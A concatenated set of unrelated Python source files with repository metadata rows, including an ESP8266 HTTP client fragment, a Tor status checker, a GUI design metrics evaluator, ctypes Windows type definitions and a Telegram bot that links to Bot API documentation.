postHeader="POST "+path+" HTTP/1.1\r\n"+"Host: "+host+"\r\n"+"User-Agent: "+user_agent+"\r\n"+"Content-Type: "+content_type+"\r\n"+"Content-Length: "+str(len(content))+"\r\n"+"\r\n"+content+"\r\n";
#print(postHeader,len(postHeader))
txData="AT+CIPSEND="+str(len(postHeader))+"\r\n"
retData = self._sendToESP8266(txData)
if(retData != None):
if ">" in retData:
retData = self._sendToESP8266(postHeader, delay=2)
#print(".......@@",retData)
self._sendToESP8266("AT+CIPCLOSE\r\n")
#print(self.__httpResponse)
retData=self.__httpResponse.parseHTTP(retData)
return retData, self.__httpResponse.getHTTPResponse()
else:
return 0, None
else:
return 0, None
else:
self._sendToESP8266("AT+CIPCLOSE\r\n")
return 0, None
def __del__(self):
"""
The distaructor for ESP8266 class
"""
print('Destructor called, ESP8266 deleted.')
pass
| 36.497041 | 209 | 0.541829 | 17,976 | 0.971466 | 0 | 0 | 0 | 0 | 0 | 0 | 8,962 | 0.484328 |
d318c848b55117fd7c66c4af724183f8868ea105 | 436 | py | Python | src/data_science/data_science/tools/time.py | viclule/api_models_deployment_framework | 7595cf0b4f3e277925b968014102d7561547bcd4 | [
"MIT"
] | null | null | null | src/data_science/data_science/tools/time.py | viclule/api_models_deployment_framework | 7595cf0b4f3e277925b968014102d7561547bcd4 | [
"MIT"
] | null | null | null | src/data_science/data_science/tools/time.py | viclule/api_models_deployment_framework | 7595cf0b4f3e277925b968014102d7561547bcd4 | [
"MIT"
] | null | null | null | from datetime import datetime, timezone
def get_timestamp_isoformat():
"""
Generate a timestampt in iso format.
"""
dt = datetime.utcnow().replace(microsecond=0).isoformat("T") + "Z"
return dt
def get_timestamp_unix():
"""
Generate a timestampt in unix format.
########.###
"""
dt = datetime.utcnow().replace()
timestamp = dt.replace(tzinfo=timezone.utc).timestamp()
return timestamp
| 21.8 | 70 | 0.637615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 128 | 0.293578 |
d318e2e1e00efb11661eb79da804990357c744f8 | 511 | py | Python | examples/crab_gateway.py | OnroerendErfgoed/crabpy | 218607957fbb9293a3054ae0613f7c2e3e44f697 | [
"MIT"
] | 4 | 2015-01-04T19:22:47.000Z | 2018-10-17T20:09:01.000Z | examples/crab_gateway.py | OnroerendErfgoed/crabpy | 218607957fbb9293a3054ae0613f7c2e3e44f697 | [
"MIT"
] | 123 | 2015-02-22T22:25:45.000Z | 2022-03-01T17:58:06.000Z | examples/crab_gateway.py | OnroerendErfgoed/crabpy | 218607957fbb9293a3054ae0613f7c2e3e44f697 | [
"MIT"
] | 2 | 2017-06-06T09:29:29.000Z | 2017-09-15T11:44:23.000Z | # -*- coding: utf-8 -*-
'''
This script demonstrates using the crab gateway to walk the entire
address tree (street and number) of a `gemeente`.
'''
from crabpy.client import crab_request, crab_factory
from crabpy.gateway.crab import CrabGateway
g = CrabGateway(crab_factory())
gemeente = g.get_gemeente_by_id(1)
print(str(gemeente))
for s in gemeente.straten:
print("* %s" % s)
for h in s.huisnummers:
print("\t* %s" % h)
for sa in h.subadressen:
print("\t\t* %s" % sa)
| 24.333333 | 66 | 0.661448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 171 | 0.334638 |
d31a96e194e159ff9f667fe1d5373f70080f5da4 | 1,127 | py | Python | datatracer/foreign_key/base.py | HDI-Project/DataTracer | 4bb0906f1716bbcfeb0881cade5d6d47bca90764 | [
"MIT"
] | 15 | 2020-05-27T11:55:05.000Z | 2022-02-08T11:07:54.000Z | datatracer/foreign_key/base.py | HDI-Project/DataTracer | 4bb0906f1716bbcfeb0881cade5d6d47bca90764 | [
"MIT"
] | 21 | 2020-06-02T11:56:13.000Z | 2021-07-29T21:50:27.000Z | datatracer/foreign_key/base.py | HDI-Project/DataTracer | 4bb0906f1716bbcfeb0881cade5d6d47bca90764 | [
"MIT"
] | 3 | 2021-01-19T17:10:58.000Z | 2021-08-13T20:47:33.000Z | """Foreign Key Solving base class."""
class ForeignKeySolver():
def fit(self, list_of_databases):
"""Fit this solver.
Args:
list_of_databases (list):
List of tuples containing ``MetaData`` instnces and table dictinaries,
which contain table names as input and ``pandas.DataFrames`` as values.
"""
pass
def solve(self, tables, primary_keys=None):
"""Solve the foreign key detection problem.
The output is a list of foreign key specifications, in order from the most likely
to the least likely.
Args:
tables (dict):
Dict containing table names as input and ``pandas.DataFrames``
as values.
primary_keys (dict):
(Optional). Dictionary of table primary keys, as returned by the Primary
Key Solvers. This parameter is optional and not all the subclasses need it.
Returns:
dict:
List of foreign key specifications, sorted by likelyhood.
"""
raise NotImplementedError()
| 32.2 | 91 | 0.593611 | 1,086 | 0.96362 | 0 | 0 | 0 | 0 | 0 | 0 | 943 | 0.836735 |
d31b0e2a66034752b1a8448b8586de5dae1ee9d7 | 10,963 | py | Python | aim2_metrics/aim/evaluators/evaluators.py | heseba/aim | 938336a17c503390ec98a730a828e4b26e5900d7 | [
"MIT"
] | null | null | null | aim2_metrics/aim/evaluators/evaluators.py | heseba/aim | 938336a17c503390ec98a730a828e4b26e5900d7 | [
"MIT"
] | null | null | null | aim2_metrics/aim/evaluators/evaluators.py | heseba/aim | 938336a17c503390ec98a730a828e4b26e5900d7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Evaluators.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
# Standard library modules
import importlib
import time
from datetime import date
from pathlib import Path
from typing import Any, Dict, List, Optional
# Third-party modules
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import pandas as pd
import seaborn as sns
from loguru import logger
# First-party modules
from aim.core import image_utils
# ----------------------------------------------------------------------------
# Metadata
# ----------------------------------------------------------------------------
__author__ = "Markku Laine"
__date__ = "2021-02-09"
__email__ = "markku.laine@aalto.fi"
__version__ = "1.0"
# ----------------------------------------------------------------------------
# Evaluators
# ----------------------------------------------------------------------------
class GUIDesignsEvaluator:
# Private constants
_METRICS: List[str] = [
"m1_png_file_size", # PNG file size
"m2_jpeg_file_size", # JPEG file size
"m3_distinct_rgb_values", # Distinct RGB values
"m4_contour_density", # Contour density
"m5_figure_ground_contrast", # Figure-ground contrast
"m6_contour_congestion", # Contour congestion
]
_METRIC_RESULTS = {
"m1_result_1": {"name": "PNG file size in bytes"},
"m2_result_1": {"name": "JPEG file size in bytes"},
"m3_result_1": {"name": "Number of distinct RGB values"},
"m4_result_1": {"name": "Contour density"},
"m5_result_1": {"name": "Figure-ground contrast"},
"m6_result_1": {"name": "Contour congestion"},
}
# Public constants
NAME: str = "GUI Designs Evaluator"
VERSION: str = "1.0"
# Initializer
def __init__(self, input_dir: str, output_dir: str, plot_results: bool):
self.input_dir: Path = Path(input_dir)
self.input_csv_file: Optional[Path] = None
self.input_gui_design_files: List[Path] = []
self.results: Optional[List[Dict[str, Any]]] = None
self.output_dir: Path = Path(output_dir) / self.input_dir.name
self.output_csv_file: Path = self.output_dir / "{}.csv".format(
self.output_dir.name
)
self.plot_results: bool = plot_results
# Private methods
def _set_input_csv_file(self):
for csv_file_path in list(self.input_dir.glob("*.csv"))[:1]:
self.input_csv_file = csv_file_path
def _set_input_gui_design_files(self):
# Get input CSV file
if self.input_csv_file:
# Read input data
input_df = pd.read_csv(self.input_csv_file)
# Exclude some rows
input_df = input_df.loc[input_df["include"] == "yes"]
# Get input GUI design files
self.input_gui_design_files = [
self.input_dir / file for file in input_df["filename"].tolist()
]
# No input CSV file available
else:
# Get input GUI design files
self.input_gui_design_files = list(self.input_dir.glob("*.png"))
def _set_results(self):
# Get output CSV file (previous results)
if self.output_csv_file.exists():
# Create DataFrame
results_df: pd.DataFrame = pd.read_csv(self.output_csv_file)
# Remove unfinished evaluation rows
results_df = results_df.dropna()
# Convert DataFrame to List
self.results = results_df.to_dict("records")
# No output CSV file (previous results) available
else:
self.results = []
def _execute_metrics(self):
# Iterate over input GUI design files
for input_gui_design_file in self.input_gui_design_files[
len(self.results) :
]:
logger.info("Evaluating {}...".format(input_gui_design_file.name))
# Start total timer
start_time_total: float = time.time()
# Initialize GUI design results row
results_row = {}
results_row["filename"] = input_gui_design_file.name
results_row["evaluation_date"] = date.today().isoformat()
# Read GUI design image (PNG)
start_time: float = time.time()
gui_image_png_base64: str = image_utils.read_image(
input_gui_design_file
)
end_time: float = time.time()
results_row["read_image_time"] = round(end_time - start_time, 4)
# Iterate over AIM metrics
for metric in self._METRICS:
# Import metric module
metric_module = importlib.import_module(
"aim.metrics." + metric
)
# Execute metric
start_time: float = time.time()
metric_results: Optional[
List[Any]
] = metric_module.Metric.execute_metric(gui_image_png_base64)
end_time: float = time.time()
results_row[metric.partition("_")[0] + "_time"] = round(
end_time - start_time, 4
)
# Iterate over metrics results
for index, metric_result in enumerate(metric_results):
if type(metric_result) is float:
results_row[
metric.partition("_")[0]
+ "_result_"
+ str(index + 1)
] = round(metric_result, 4)
else:
results_row[
metric.partition("_")[0]
+ "_result_"
+ str(index + 1)
] = metric_result
# End total timer
end_time_total: float = time.time()
results_row["total_evaluation_time"] = round(
end_time_total - start_time_total, 4
)
# Append results
self.results.append(results_row)
# Precaution against crashes: save results after each GUI design
# evaluation instead of after completing all of them
self._save_results()
def _save_results(self):
# Create DataFrame
results_df: pd.DataFrame = pd.DataFrame(self.results)
# Reorder columns
cols: List[str] = results_df.columns.tolist()
sorted(cols)
cols.remove("filename")
cols.remove("evaluation_date")
cols.remove("read_image_time")
cols.remove("total_evaluation_time")
cols = [
"filename",
"evaluation_date",
"total_evaluation_time",
"read_image_time",
] + cols
results_df = results_df[cols]
# Create directories, if needed
if not self.output_dir.exists():
self.output_dir.mkdir(parents=True)
# Save results
results_df.to_csv(self.output_csv_file, index=False)
def _reformat_large_tick_values(self, tick_val, pos):
"""
Turns large tick values (in the billions, millions and thousands) such as 4500 into 4.5K and also appropriately turns 4000 into 4K (no zero after the decimal).
Source: https://dfrieds.com/data-visualizations/how-format-large-tick-values.html
"""
if tick_val >= 1000000000:
val = round(tick_val / 1000000000, 1)
new_tick_format = "{:}B".format(val)
elif tick_val >= 1000000:
val = round(tick_val / 1000000, 1)
new_tick_format = "{:}M".format(val)
elif tick_val >= 1000:
val = round(tick_val / 1000, 1)
new_tick_format = "{:}K".format(val)
else:
new_tick_format = round(tick_val, 4)
# Make new_tick_format into a string value
new_tick_format = str(new_tick_format)
# Code below will keep 4.5M as is but change values such as 4.0M to 4M since that zero after the decimal isn't needed
index_of_decimal = new_tick_format.find(".")
if index_of_decimal != -1 and (tick_val >= 1000 or tick_val == 0):
value_after_decimal = new_tick_format[index_of_decimal + 1]
if value_after_decimal == "0":
# Remove the 0 after the decimal point since it's not needed
new_tick_format = (
new_tick_format[0:index_of_decimal]
+ new_tick_format[index_of_decimal + 2 :]
)
return new_tick_format
def _plot_results(self):
# Plot results
if self.plot_results:
# Get output CSV file (evaluation results)
evaluation_results_df = pd.read_csv(
self.output_csv_file,
header=0,
dtype={"filename": "str"},
parse_dates=[1],
)
# Plot metric evaluation results
width: int = 700 # in pixels
height: int = 500 # in pixels
dpi: int = 72
for key, value in self._METRIC_RESULTS.items():
# Create a new figure and configure it
sns.set(rc={"figure.figsize": (width / dpi, height / dpi)})
sns.set_style("ticks")
sns.set_context("paper", font_scale=1.5)
plt.figure()
# Plot data on a histogram and configure it
ax = sns.histplot(
list(evaluation_results_df[key]),
kde=False,
color="#7553A0",
bins=30,
)
ax.set_xlabel(
value["name"],
fontstyle="normal",
fontweight="normal",
labelpad=10,
)
ax.set_ylabel(
"Frequency",
fontstyle="normal",
fontweight="normal",
labelpad=10,
)
ax.xaxis.grid(False)
ax.yaxis.grid(False)
ax.xaxis.set_major_formatter(
ticker.FuncFormatter(self._reformat_large_tick_values)
)
sns.despine(ax=ax, left=False, bottom=False)
# Save plot
output_plot_file: Path = (
self.output_dir / "{}_evaluator.png".format(key)
)
plt.savefig(output_plot_file, dpi=dpi, transparent=False)
# Public methods
def evaluate(self):
self._set_input_csv_file()
self._set_input_gui_design_files()
self._set_results()
self._execute_metrics()
self._plot_results()
| 35.478964 | 167 | 0.532062 | 9,904 | 0.903402 | 0 | 0 | 0 | 0 | 0 | 0 | 3,211 | 0.292894 |
d31cf351b110249c4460fb2251ddbafce2b5a201 | 368 | py | Python | Traditional/split_path.py | hmarko/netapp-data-science-toolkit | ffec0eda608e79c20b628a7ac086cac1101843e8 | [
"BSD-3-Clause"
] | null | null | null | Traditional/split_path.py | hmarko/netapp-data-science-toolkit | ffec0eda608e79c20b628a7ac086cac1101843e8 | [
"BSD-3-Clause"
] | null | null | null | Traditional/split_path.py | hmarko/netapp-data-science-toolkit | ffec0eda608e79c20b628a7ac086cac1101843e8 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
import os
from posixpath import normpath
path = "///data/video/project1//"
normalized_path = os.path.normpath(path)
sep_path = normalized_path.split(os.sep)
path_tail = sep_path[-1] #last word in path - need to be volume name
currentPath = ''
for folder in sep_path:
if folder:
currentPath += "/"+folder
print (currentPath)
| 26.285714 | 68 | 0.703804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 96 | 0.26087 |
d31d05d65e96e8eb5e6db72874f6fcc4ab556220 | 2,325 | py | Python | http/torcheck.py | k11dd00/oniongen | 00d7992920c59de4a5584357a35494fbdde0a6d9 | [
"MIT"
] | null | null | null | http/torcheck.py | k11dd00/oniongen | 00d7992920c59de4a5584357a35494fbdde0a6d9 | [
"MIT"
] | 1 | 2021-11-09T02:38:38.000Z | 2021-11-09T02:38:38.000Z | http/torcheck.py | k11dd00/oniongen | 00d7992920c59de4a5584357a35494fbdde0a6d9 | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (c) 2018 k1dd00
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE
# -*- coding: utf-8; mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vim: fileencoding=utf-8 tabstop=4 expandtab shiftwidth=4
# pylint: disable=C0103,C0301,W1202,W0212
import urllib2
from BeautifulSoup import BeautifulSOAP
class TorCheck(object):
"""
The TorCheck class.
This class checks the tor status and ip address
"""
IP_CHECK_ENDPOINT = "http://icanhazip.com"
TOR_CHECK_ENDPOINT = "https://check.torproject.org"
def __init__(self):
self.text_key = "congratulations"
def check_ip(self):
"""
Checks the ip address
Returns
-------
ip: str
The ip address
"""
request = urllib2.urlopen(self.IP_CHECK_ENDPOINT)
response = request.read()
return response.strip()
def check_tor_status(self):
"""
Checks the tor status
Returns
-------
status: Bool
The tor status
"""
html = urllib2.urlopen(self.TOR_CHECK_ENDPOINT).read()
parsed_html = BeautifulSOAP(html)
content = parsed_html.body.find('h1', attrs={'class':'not'}).text
return self.text_key in content.lower()
| 32.746479 | 81 | 0.68086 | 975 | 0.419355 | 0 | 0 | 0 | 0 | 0 | 0 | 1,679 | 0.722151 |
d31d611e4b40f5de20572912a046b15c498ee7dd | 519 | py | Python | ObjectsName_to_Meshs/ObjectsName_to_Meshs.py | a2d4f3s1/Blender-Tips | e897f78a406243aa9959e226e13a7e214638179f | [
"MIT"
] | null | null | null | ObjectsName_to_Meshs/ObjectsName_to_Meshs.py | a2d4f3s1/Blender-Tips | e897f78a406243aa9959e226e13a7e214638179f | [
"MIT"
] | null | null | null | ObjectsName_to_Meshs/ObjectsName_to_Meshs.py | a2d4f3s1/Blender-Tips | e897f78a406243aa9959e226e13a7e214638179f | [
"MIT"
] | null | null | null | ## メッシュ名をオブジェクト名に変更し、メッシュリンクなオブジェクトを選択
import bpy
objects = bpy.data.objects
shareObjects = list()
## Deselect All
for object in objects:
bpy.context.scene.objects[(object.name)].select_set(False)
## Copy Name obj to mesh
for obj in objects:
if obj.data and obj.data.users == 1: ## if no shared mesh
obj.data.name = obj.name
else :
print (obj)
shareObjects.append(obj)
## Select Linked mesh obj
for obj in shareObjects:
bpy.context.scene.objects[(obj.name)].select_set(True)
| 23.590909 | 62 | 0.693642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 192 | 0.325976 |
d31e759f50ddb0b000972b746bbc9dcd6c046e1e | 9,311 | py | Python | tgbotapi.py | suhasa010/tgbotapi-bot | 23894c7e239ca56cd1f5588bcda27c53b361f8da | [
"MIT"
] | 5 | 2020-12-20T21:36:27.000Z | 2021-05-09T08:26:04.000Z | tgbotapi.py | suhasa010/tgbotapi-bot | 23894c7e239ca56cd1f5588bcda27c53b361f8da | [
"MIT"
] | 1 | 2020-12-06T16:12:07.000Z | 2020-12-06T16:12:07.000Z | tgbotapi.py | suhasa010/tgbotapi-bot | 23894c7e239ca56cd1f5588bcda27c53b361f8da | [
"MIT"
] | 2 | 2020-12-06T16:03:52.000Z | 2021-01-17T03:36:33.000Z | from telegram.ext import Updater
import os
from dotenv import load_dotenv
load_dotenv()
BOT_API = os.getenv("BOT_API")
updater = Updater(token=BOT_API, use_context=True)
dispatcher = updater.dispatcher
import logging
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO)
def start(update, context):
context.bot.send_message(chat_id=update.effective_chat.id, text="Hi, I am here to help you browse the documentation of Telegram Bot API right here on Telegram using Instant View.")
from telegram.ext import CommandHandler
start_handler = CommandHandler('start', start)
dispatcher.add_handler(start_handler)
#def echo(update, context):
# context.bot.send_message(chat_id=update.effective_chat.id, text=update.message.text)
#from telegram.ext import MessageHandler, Filters
#echo_handler = MessageHandler(Filters.text & (~Filters.command), echo)
#dispatcher.add_handler(echo_handler)
# def caps(update, context):
# # if context.args == null:
# # context.bot.send_message(chat_id=update.effective_chat.id, text="send some text, you fool!")
# print("arguments are" + context.args)
# text_caps = ' '.join(context.args).upper()
# context.bot.send_message(chat_id=update.effective_chat.id, text=text_caps)
# caps_handler = CommandHandler('caps', caps)
# dispatcher.add_handler(caps_handler)
from uuid import uuid4
from telegram import InlineQueryResultArticle, InputTextMessageContent
def inline_caps(update, context):
query = update.inline_query.query
results = list()
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Telegram Bot API Documentation',
input_message_content=InputTextMessageContent("https://core.telegram.org/bots/api/?v=1", disable_web_page_preview=False),
description='Telegram Bot API Main page',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
#context.bot.answer_inline_query(update.inline_query.id, results)
#results = list()
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Announcements ➜ Recent Changes',
input_message_content=InputTextMessageContent("""Recent Changes\nhttps://core.telegram.org/bots/api/?v=1#recent-changes""", parse_mode='HTML'),
description='Telegram Bot API Announcements',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Making Requests',
input_message_content=InputTextMessageContent("""Making Requests\nhttps://core.telegram.org/bots/api/?v=1#making-requests""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Using a Local Bot API Server',
input_message_content=InputTextMessageContent("""Using a Local Bot API Server\nhttps://core.telegram.org/bots/api/?v=1#using-a-local-bot-api-server""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Getting Updates',
input_message_content=InputTextMessageContent("""Getting Updates\nhttps://core.telegram.org/bots/api/?v=1#getting-updates""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Available Types',
input_message_content=InputTextMessageContent("""Available Types\nhttps://core.telegram.org/bots/api/?v=1#available-types""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Available Methods',
input_message_content=InputTextMessageContent("""Available Methods\nhttps://core.telegram.org/bots/api/?v=1#available-methods""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Updating Messages',
input_message_content=InputTextMessageContent("""Updating Messages\nhttps://core.telegram.org/bots/api/?v=1#updating-messages""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Stickers',
input_message_content=InputTextMessageContent("""Stickers\nhttps://core.telegram.org/bots/api/?v=1#stickers""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Inline Mode',
input_message_content=InputTextMessageContent("""Inline Mode\nhttps://core.telegram.org/bots/api/?v=1#inline-mode""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Payments',
input_message_content=InputTextMessageContent("""Payments\nhttps://core.telegram.org/bots/api/?v=1#payments""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Telegram Passport',
input_message_content=InputTextMessageContent("""Telegram Passport\nhttps://core.telegram.org/bots/api/?v=1#telegram-passport""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Games',
input_message_content=InputTextMessageContent("""Games\nhttps://core.telegram.org/bots/api/?v=1#games""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
if query.lower() == 'format':
results = list()
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Request Format',
input_message_content=InputTextMessageContent("""<code>#request
Book's name
Author's name
#ebook or #audiobook
[Amazon link to audiobook/KU book, if applicable]</code>""", parse_mode='HTML'),
)
)
context.bot.answer_inline_query(update.inline_query.id, results)
from telegram.ext import InlineQueryHandler
inline_caps_handler = InlineQueryHandler(inline_caps)
dispatcher.add_handler(inline_caps_handler)
updater.start_polling() | 44.550239 | 184 | 0.671356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,254 | 0.456781 |
d31f11e2bab844fa68163cfc4bba33ce06b7e294 | 2,387 | py | Python | python/helpers/pydev/third_party/wrapped_for_pydev/ctypes/wintypes.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 695 | 2020-01-30T14:34:51.000Z | 2022-03-31T09:31:57.000Z | python/helpers/pydev/third_party/wrapped_for_pydev/ctypes/wintypes.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 1,095 | 2018-03-01T00:50:11.000Z | 2019-05-06T17:44:15.000Z | python/helpers/pydev/third_party/wrapped_for_pydev/ctypes/wintypes.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 111 | 2015-12-01T14:06:10.000Z | 2020-08-01T10:44:39.000Z | #@PydevCodeAnalysisIgnore
# XXX This module needs cleanup.
from ctypes import *
DWORD = c_ulong
WORD = c_ushort
BYTE = c_byte
ULONG = c_ulong
LONG = c_long
LARGE_INTEGER = c_longlong
ULARGE_INTEGER = c_ulonglong
HANDLE = c_ulong # in the header files: void *
HWND = HANDLE
HDC = HANDLE
HMODULE = HANDLE
HINSTANCE = HANDLE
HRGN = HANDLE
HTASK = HANDLE
HKEY = HANDLE
HPEN = HANDLE
HGDIOBJ = HANDLE
HMENU = HANDLE
LCID = DWORD
WPARAM = c_uint
LPARAM = c_long
BOOL = c_long
VARIANT_BOOL = c_short
LPCOLESTR = LPOLESTR = OLESTR = c_wchar_p
LPCWSTR = LPWSTR = c_wchar_p
LPCSTR = LPSTR = c_char_p
class RECT(Structure):
_fields_ = [("left", c_long),
("top", c_long),
("right", c_long),
("bottom", c_long)]
RECTL = RECT
class POINT(Structure):
_fields_ = [("x", c_long),
("y", c_long)]
POINTL = POINT
class SIZE(Structure):
_fields_ = [("cx", c_long),
("cy", c_long)]
SIZEL = SIZE
def RGB(red, green, blue):
return red + (green << 8) + (blue << 16)
class FILETIME(Structure):
_fields_ = [("dwLowDateTime", DWORD),
("dwHighDateTime", DWORD)]
class MSG(Structure):
_fields_ = [("hWnd", HWND),
("message", c_uint),
("wParam", WPARAM),
("lParam", LPARAM),
("time", DWORD),
("pt", POINT)]
MAX_PATH = 260
class WIN32_FIND_DATAA(Structure):
_fields_ = [("dwFileAttributes", DWORD),
("ftCreationTime", FILETIME),
("ftLastAccessTime", FILETIME),
("ftLastWriteTime", FILETIME),
("nFileSizeHigh", DWORD),
("nFileSizeLow", DWORD),
("dwReserved0", DWORD),
("dwReserved1", DWORD),
("cFileName", c_char * MAX_PATH),
("cAlternameFileName", c_char * 14)]
class WIN32_FIND_DATAW(Structure):
_fields_ = [("dwFileAttributes", DWORD),
("ftCreationTime", FILETIME),
("ftLastAccessTime", FILETIME),
("ftLastWriteTime", FILETIME),
("nFileSizeHigh", DWORD),
("nFileSizeLow", DWORD),
("dwReserved0", DWORD),
("dwReserved1", DWORD),
("cFileName", c_wchar * MAX_PATH),
("cAlternameFileName", c_wchar * 14)]
| 24.111111 | 53 | 0.553414 | 1,642 | 0.687893 | 0 | 0 | 0 | 0 | 0 | 0 | 508 | 0.212819 |
d31fa655ac64aa971997076b0728810b41a6b669 | 2,899 | py | Python | publishfeed/tests.py | RobertLD/publishfeed-OTC | b67192517706f5dfbe0210f5deaef258ae10d28d | [
"MIT"
] | 9 | 2017-06-08T18:13:33.000Z | 2021-11-02T12:41:46.000Z | publishfeed/tests.py | RobertLD/publishfeed-OTC | b67192517706f5dfbe0210f5deaef258ae10d28d | [
"MIT"
] | 4 | 2021-03-30T15:52:52.000Z | 2021-04-11T17:22:46.000Z | publishfeed/tests.py | RobertLD/publishfeed-OTC | b67192517706f5dfbe0210f5deaef258ae10d28d | [
"MIT"
] | 4 | 2020-11-26T23:20:16.000Z | 2022-03-03T12:20:25.000Z | import unittest
from models import FeedSet, Base, RSSContent
import config
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from unittest.mock import MagicMock
from test_data.feedparser_data import fake_response
from helpers import RSSContentHelper, FeedSetHelper
class TestFeedSet(unittest.TestCase):
def setUp(self):
